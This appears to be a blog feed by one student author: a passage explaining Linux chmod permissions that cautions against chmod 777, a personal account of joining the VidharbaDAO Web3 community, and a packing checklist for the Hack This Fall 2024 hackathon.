`rwx`	111	7	Read + Write + Execute

So when you write:

chmod 777 myfile

You're saying:

Owner: 7 → rwx
Group: 7 → rwx
Others: 7 → rwx

Everyone can do everything. It’s the nuclear option.

Why `chmod 777` Feels Great — But Can Be Dangerous

Yes, running chmod 777 usually fixes permission errors in the moment. But it’s like saying:

“I don’t care who, just let anyone touch this file however they want.”

What Could Go Wrong?

A random user or script could delete or rewrite your file.
Malicious actors (or even a confused teammate) could execute harmful code.
Your system could get cluttered with unauthorized changes — or worse, break entirely.

When Is `chmod 777` Okay?

Like using duct tape on a cracked pipe — sometimes it's fine temporarily, just not a permanent fix.

Okay-ish Scenarios:

You're in a local testing environment (not public-facing).
You're debugging and need to eliminate permission errors quickly.
You're working on a throwaway script or temp files.

But Never In:

Production environments
Web servers — exposing the file to the world
Shared systems with multiple users

Better Alternatives to `chmod 777`

Let’s say you’re working on a script named deploy.sh, and you want to run it, but only you should be able to edit it.

Use:

chmod 755 deploy.sh

That gives:

Owner: rwx
Group: r-x
Others: r-x

Or if it’s a plain text file you just want to share:

chmod 644 notes.txt

That gives:

Owner: rw-
Group: r--
Others: r--

Quick Cheat Sheet:

Command	What It Does
`chmod 777`	Everyone can read, write, execute
`chmod 755`	Owner: full access, others: read+run
`chmod 644`	Owner: read/write, others: read only
`chmod 700`	Only owner can do anything

Permissions Are Your First Line of Defense

Giving everything 777 permissions is like taping a spare house key to your front door — convenient, but very risky.

Take the extra minute to think about who actually needs access, and apply the right permission numbers.

Final Thought

Don’t let permission errors frustrate you into compromising your system. Learning how to read and set permissions properly will save you from a ton of headaches — and possibly from an accidental disaster.

And next time someone asks what chmod 777 does, you’ll be the one who explains it with confidence and clarity.

Written by someone who once chmod’d an entire project folder to 777, uploaded it to a server, and learned the hard way that — yeah, bad idea.

Learner From The Learners Den
Aishwary Gathe

VidharbaDAO: A Journey of Growth and Community

Aishwary Gathe — Fri, 06 Sep 2024 05:01:30 +0000

My journey with VidharbaDAO began when I was a second-year student, stepping into the world of Web3, a new and exciting domain. Web3 felt like this distant concept at the time—something complex and elusive. But VidharbaDAO made it accessible, bringing the basics to us beginners through a series of insightful events. The question "What is Web3 and how does it work?" was answered first. That’s where it all started for me.

Two key figures, Anshita Soni and Anmoldeep Singh, stood out as mentors. They hosted most of the events, shaping my early understanding of Web3. Their energy was contagious, and through them, I found myself becoming more curious about this emerging field. I still remember Devansh—he started just like us, as someone exploring Web3, but soon, we watched him rise through the ranks, earning the title of a Solana Superteam contributor. It was inspiring to see someone within our circle achieve something so significant.

After a few more events, we also met Gyan, the airdrop hunter. Gyan’s presence and knowledge added another layer to our Web3 discussions, showing us how diverse and dynamic the Web3 space can be.

As time passed, my interest in Web3 grew—not just as a technology but as a community. By my third year, I joined the VidharbaDAO team. While Web3 wasn’t my core interest, I felt a sense of belonging just being around this community. We slowly evolved into a Web3 family, working together on events for CapxAI, Solana Superteam IRL calls and Berachain. These experiences taught me that it’s not just the technology but the people and collaboration that make this space special.

One of the proudest moments of my journey with VidharbaDAO came when we organized an entire event for children at an orphanage. Bringing Web3 to a different audience and seeing the joy on those kids' faces was an achievement I hold close to my heart. It was one of those moments when I realized how much this community has helped me grow—not just as a student, but as a person.

VidharbaDAO didn’t just introduce me to Web3; it introduced me to a network of passionate people who uplift and inspire each other. Being part of this community is one of my proudest achievements, and I’m excited to see where this journey will take us next.
Many more people Behind the Blog to tag...

For those who don't want to read blahh. blahh.. blahhhhh...

In my second year, I was introduced to Web3 through VidharbaDAO, attending beginner events hosted by mentors Anshita Soni and Anmoldeep Singh. I watched community members like Devansh rise to become a contributor to Solana Superteam and met Gyan, an airdrop hunter. In my third year, I joined the team, even though Web3 wasn’t my main focus. We became a Web3 family, organizing events for CapxAI and Solana Superteam, and one of my proudest moments was hosting an event at an orphanage. VidharbaDAO not only expanded my knowledge of Web3 but also helped me grow personally, and I’m excited to continue this journey.

Aishwary Gathe ❤
aishwarygathe@gmail.com

Preparing for Hack This Fall 2024: Your Ultimate Packing Guide. . . .

Aishwary Gathe — Mon, 05 Feb 2024 13:55:44 +0000

Introduction

Hack This Fall 2024 is just around the corner, and the excitement is building up for the 36-hour in-person hackathon in Gandhinagar, Gujarat. I've compiled a comprehensive packing guide to ensure you make the most of this thrilling experience. Follow this checklist to ensure a smooth and productive hackathon adventure.

What to Pack

Essentials

📝 Documents:

ID Proof
Invitation email for Hack This Fall
Parents' Consent Form (If you are below 18)

🔌 Electronic devices:

Laptop
Mobile phone
Chargers for all electronic devices
Multi-type charging cable
Power bank
Extension boards

Additional peripherals:

Mouse, Keyboard, and Headphones
Specific hardware (if required)
Wifi/hotspot device (for better connectivity)

♻️ Eco-friendly initiative:

Reusable water bottle

Ergonomics

Mouse-pad
Neck pillow
Laptop stand

Personal Health, Hygiene & Well-being

Health:

Prescription-grade medicine (if applicable)
Personal first-aid kit:
Bandaids
Cotton gauze
Anti-septic liquid
Anti-septic powder
Medical tape

🗳️ Personal hygiene kit:

Toothbrush & toothpaste
Hand sanitizer
Hand/face wipes
Deodorant/perfume/body mist
Hair comb
Personal reusable hand towel

💫 Well-being:

Blanket
Extra pairs of clean socks
Additional pair of clothes
Sweaters for warmth

What Not to Pack

For the safety and security of all participants, certain items are prohibited:

Sharp objects
Alcoholic beverages, controlled drugs, or narcotics
Inflammable substances/liquids
Dangerous goods
Firearms or ammunition
Animals or pets
Realistic replicas of firearms
Fireworks
Gold or precious metals
Hazardous waste

What to Expect at Hack This Fall

Amenities Provided at the Venue

Meals served on respective days
Supervised sleeping space on both nights
Separate sleeping rooms for women and men
Clean washrooms and personal hygiene facilities
Sanitary kits for female hackers
Shared public wifi
Two plug points per hacker table (shared among four hackers)

Additional Items for Midnight Hackathon

As you embark on the midnight hacking adventure, consider adding the following items to your packing list:

Snacks and Energy Drinks: Keep your energy levels up during the late-night coding sessions.
Eye Mask and Earplugs: Ensure a peaceful nap during break times.
Extra Lighting: A small desk lamp can be handy for a well-lit workspace.
Post-it Notes and Markers: Perfect for jotting down quick ideas and reminders.

Quick Summary: Hack This Fall 2024 Packing Guide

Hack This Fall 2024 is just around the corner! Ensure a smooth hackathon experience with this packing guide.
Essentials:
Bring ID, Hackathon invitation, and consent form if under 18.
Don't forget your laptop, phone, chargers, and extension boards.
Reusable water bottles for an eco-friendly approach.

Ergonomics:
Enhance comfort with a mouse pad, neck pillow, and laptop stand.

Health & Hygiene:
Pack prescription medicines and a personal first-aid kit.
Personal hygiene kit: toothbrush, hand sanitizer, wipes, deodorant, hair comb, and a reusable hand towel.
Well-being essentials: blanket, extra socks, change of clothes, and sweaters.

What Not to Pack:
Prohibited items include sharp objects, alcohol, flammable substances, firearms, and more.

What to Expect at Hack This Fall:
Meals, supervised sleeping spaces, clean washrooms, and amenities provided.
Special arrangements for female hackers and shared public wifi.

Additional Items for Midnight Hackathon:
Snacks, energy drinks, eye masks, earplugs, extra lighting, post-it notes, and markers.

With this guide, you're prepared for a successful and comfortable hackathon. Good luck and see you at Hack This Fall 2024!

Conclusion
With this comprehensive packing guide, you're all set to make the most of Hack This Fall 2024. Pack smart, stay energized, and prepare for an unforgettable hackathon experience! We look forward to seeing your innovative creations at the event. Good luck!

Let's see Schedule (Tap here)

Previous Blog Link (Diving into Hack This Fall: My Adventure in Learning and Community)